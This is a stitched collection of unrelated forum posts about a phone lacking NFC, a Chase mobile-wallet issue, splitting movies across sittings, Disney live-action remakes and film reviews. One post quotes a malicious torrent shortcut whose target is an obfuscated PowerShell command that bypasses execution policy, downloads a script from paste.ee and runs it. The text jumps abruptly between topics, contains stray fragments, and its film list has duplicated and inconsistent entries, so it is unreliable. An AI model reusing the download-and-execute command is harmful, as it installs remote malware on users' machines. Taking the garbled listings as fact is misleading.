The issue is your phone probably doesn't even support NFC.

It doesn't look like it—which is frustrating, because even though this thing is relatively new, having come out back in July 2018, I've barely had it for a few months. I just assumed it would be a standard feature by now. Is there a way to verify this for certain?

Xiaomi Mi A2 Lite - GSMArena

edit: Nope, definitely doesn't have it. Just a total bummer. I ran an NFC Check app and confirmed it. Honestly, why isn't this included in every single smartphone when the tech has been around for, what, five years already? At this rate, I won't be able to pay with my phone until next decade when I finally upgrade.🕺

It’s the middle one in the first column, sitting just under Chase Mobile

Nothing 😢—and please don't call me crazy:

All I see in that spot is "Cards," but that isn't what I'm looking for—it won't let me actually select a card for mobile payments...

And again, this app is brand new and fully updated.

Btw, I’m not entirely sure what this Go!card thing is—is it something I’m missing? Maybe that’s why my mobile wallet isn't cooperating. It doesn't even explicitly say "mobile wallet" anywhere for me; it just shows up under "Cards." I've already checked, and I’m running the latest version (the new November-December update), so that shouldn't be the issue.
Chase Bank in Banking, Insurance & Loans ·
I’m honestly stumped on how to actually activate my mobile wallet—I got the notification saying it was ready to go, but I'm hitting a wall. I log into my Chase app, head over to the banking and cards section, and I see all four of my accounts listed there (checking, savings, foreign currency, and my credit card). But there isn't even a button to "select" one; it just shows me the transaction details whenever I click on them. Any ideas?

I am A2 lite running android 9 btw

btw, people were asking about this on Google Play, and apparently, they said fingerprint support is coming soon🎉

btw, why bother even updating the app if nothing actually changes? Even the design is identical.
I was just getting into a heated debate with a buddy of mine regarding this very topic—one of those deep dives that leaves you feeling a bit drained—so I figured I’d throw a poll out here to see where the rest of the community stands. 😁

For my part, I find it perfectly reasonable to watch, say, an hour of a movie, and then—if I'm too exhausted or simply not in the right headspace—pick it back up tomorrow or whenever. It’s fine by me. It isn't like so much time passes that I lose the thread of the plot. I even do this occasionally with TV episodes when they're shorter, and honestly, it doesn't bother me one bit.

My friend, however, was absolutely floored by this idea. He can't wrap his head around what he calls "destroying the cinematic integrity" of a film. His logic is that if he starts a movie and realizes it's getting too late, he'll just skip it entirely rather than face the "horrific" prospect of watching it in pieces. He also took major issue with my comparison to TV series; he argued that an episode is a self-contained unit in its own right—completely ignoring my point that most of them end on a cliffhanger anyway.

So, I’m genuinely curious to hear how the rest of you approach this. Are you the type to break a film up into multiple sittings?

a) Absolutely not; the mere thought is unthinkable to me.
b) I’m not a fan of the idea, but if circumstances demand it, I can manage.
c) I don't particularly care whether I watch it all at once or in segments.
d) Yes, I have no problem with that at all.
e) Sometimes I even split a movie into more than two parts, and it doesn't bother me one bit.

I hadn't even realized there was a dedicated thread for this—it was a pleasant surprise to stumble upon one, though I have to admit, seeing how quiet it’s been here is a bit of a letdown. 😁
They've finally dropped the TOURDETOUR album. You can find it streaming on Deezer. 🙂Based on the singles alone—if my memory isn't failing me—we've got Zaljubila sam se, Bez tebe, Biram, Vikend, and Skrivena.

I just realized there was already a dedicated thread for this. Honestly, I think the moderators should either shut this one down or consolidate all those individual movie threads—the ones that barely ever make it past three pages anyway—into one place.

That was my whole reasoning for starting this—to have everything centralized in one substantial discussion rather than dozens of tiny, fragmented ones—but apparently, nobody’s actually listening to me.🥱

It actually looks pretty great.

swiftwalker6 said:Look, my first thought? This script basically grabs some binary from the web and runs it. You won't really know the full extent of what's happening inside without digging deep into the code, but honestly, it sounds like one of those annoying things that just messes with your icons. If it were actually high-level malicious stuff, you probably wouldn't even realize anything went wrong in the first place.

Just grab that binary from the link, toss it into VirusTotal to see what it finds, or run it through Anubis if that service is still up and running.

No, I'm not changing any icons. I haven't seen any "symptoms," if you want to call them that.

I’m not trying to hijack the OP's thread—I just figured I'd chime in with my own experience here rather than cluttering things up by starting a whole new topic. 😁

Thanks,

Yeah, it's just another one of those Disney's remakes—they seem to be churning them out endlessly these days.

I haven't sat through their entire catalog, but honestly, the 2016 version really blew me away. Next year, we're getting Mowgli based on that same book, though word is it’ll be much darker than this Disney's take.

I downloaded this torrent thinking I was getting an episode of a show, but instead of a standard .avi file, it was just a shortcut. I clicked it before realizing what happened.

When I checked the properties, the Target field showed this mess:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powersh ell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('https://paste.ee/r/wfDvH/0');IEX $wcli

Can someone please tell me how to handle this? I’m pretty sure I just triggered some script that acts like malware.

Finally, a dedicated mega-thread for all those Disney live-action adaptations born from their animated classics. I’m opening this because individual threads for every single movie—even when they get their own space here on the forum—rarely stretch past two or three pages, which frankly feels a bit pointless. This way, we can actually discuss, compare, and debate them all in one place—while also dissecting what we might expect from the upcoming slate (of which there seems to be an endless supply, if you look at the list below).

We're looking at the following films:

1994. The Jungle Book
1996. 101 Dalmatians
2000. 102 Dalmatians
2010. Alice in Wonderland
2010. The Sorcerer's Apprentice
2014. Maleficent 2015
2015. Cinderella
2016. The Jungle Book (the new adaptation by Jon Favreau; plus, we have the Warner Bros. - Mowgli version coming soon)
2016. Alice Through the Looking Glass (the sequel to the 2010 adaptation)
2017. Beauty and the Beast 2017
2018. Christopher Robin (based on Winnie the Pooh)

As for the upcoming adaptations on the horizon:
2018. The Nutcracker (from the fantasy catalog)
2019. Dumbo
2019. Aladdin 2019
2019. Cruella
2019. The Lion King (also directed by Favreau)
2020. Mulan (now, this is one I am actually looking forward to 🎉)
2020. Maleficent 2 (with Julia returning)

Cruella Jungle Book 2
Jungle Book 2 (a sequel to the 2016 adaptation; note that the plot won't align with the animated JB2)
Little Mermaid
Peter Pan
Pinocchio
The Sword in the Stone
Lilo & Stitch Tinkerbell
Tinkerbell
Snow White
Sleeping Beauty (from the fantasy catalog)

So, it looks like we'll be facing a massive wave of these adaptations very soon. 🍿

Is anyone interested in taking *Enter* magazine off my hands for free? I’ve got the run from issue #25 through #86—though there might be a few gaps in there somewhere. I'm based in San Francisco, so if you're local, I can drop them off to you at no charge; otherwise, just cover the shipping and I'll send 🙂

The Jungle Book (2016) - Jon Favreau in Movies ·
I just rewatched it with my girlfriend the other day—honestly, it’s an absolute masterpiece. 🙏 Actually, the second viewing might have even hit harder than the first. It’s definitely one of those films that warrants a rewatch every once in a while—just to stay sharp. Absolute masterpiece. 👍

I suppose I should address the latest chatter regarding the upcoming projects—it seems everyone has an opinion, though very few seem to have actually sat down and thought about the logistics involved. There is a certain exhaustion that comes with watching these massive studio cycles repeat themselves indefinitely. Regarding what Edward Ortiz77 mentioned earlier—while I appreciate the enthusiasm, I think we’re overlooking the sheer scale of the creative overhaul required here. It isn't just about changing a few lines of dialogue; it’s about the fundamental DNA of the production. I find myself agreeing with Richard Barrett53 on one specific point, even if I disagree with his overall conclusion. The industry moves at such a frantic pace now that "quality" feels like a secondary concern to "content volume." We see it constantly with the major studios in Los Angeles—just churning out iterations of stories we've already told a dozen times over. It’s a wearying cycle, really. One waits for something truly transformative, yet we usually end up with more of the same, polished to a high shine but lacking any real soul. kaže:
I’m genuinely looking forward to catching this one. I'm not sure if everyone here is aware, but Warner Bros. is actually working on their own take of The Jungle Book for 2018 as well. 😁

Austin Rodriguez5 said:After this, feel free to just give up.

This is excellent.

That was my initial thought as well—until I actually sat down and watched the trailer for this remake.
Andy Serkis Tells a Darker version of ' The Jungle Book' trailer: It seems we’re getting a much more somber take on this one—a departure from the usual bright, family-friendly spectacle you might expect from a major studio production. Instead of the lighthearted adventure many grew up with, Serkis appears to be leaning into something significantly more gritty and intense. It’s an interesting pivot, certainly, though I can't help but wonder if this shift toward "darkness" is a genuine creative choice or just another attempt to capture that prestige drama crowd. Still, seeing Mowgli through such a heavy lens provides a fascinating contrast to the versions we've seen before.
The goal was always to craft something darker—something with actual weight to it. This version is titled Mowgli.

I’ll definitely be checking this one out—if nothing else, just to see how it stacks up against the other version. Honestly, this one looks pretty solid to me. 🍿

By the way, I went ahead and started a dedicated thread for that new movie over on the message boards. I can't see the link you're referring to—could you drop it again? Once you do, I'll dive in.

Personally, I think this might be Denzel Washington's finest work to date—he absolutely crushed it.

Viola Davis is equally incredible.

Period. It’s just a damn good film, particularly that second half.

Better than Moonlight.
She’d be completely burnt out if she had to kill that many people every single day
Just a collection of mindless, unimaginative, aimless, and downright moronic cinematic nonsense.

Skip this one at all costs.

Now, I absolutely loved the first one!!!! And honestly, the second installment was pretty solid!!

This latest entry felt like nothing more than a recycled heap of boredom padded out with sheer stupidity. They could have taken the concept in a completely different direction—good grief, I could have scripted something better than this!! What even was that? The acting and directing are passable enough, I suppose, but the plot and the script? Total disaster.

I’ve sat through plenty of films that I’ve given a one-star rating on IMDb, but this? This makes those look like masterpieces. This deserves a zero. It is quite possibly the worst movie I have ever had the misfortune of watching in my entire life.

Goodbye to this franchise.
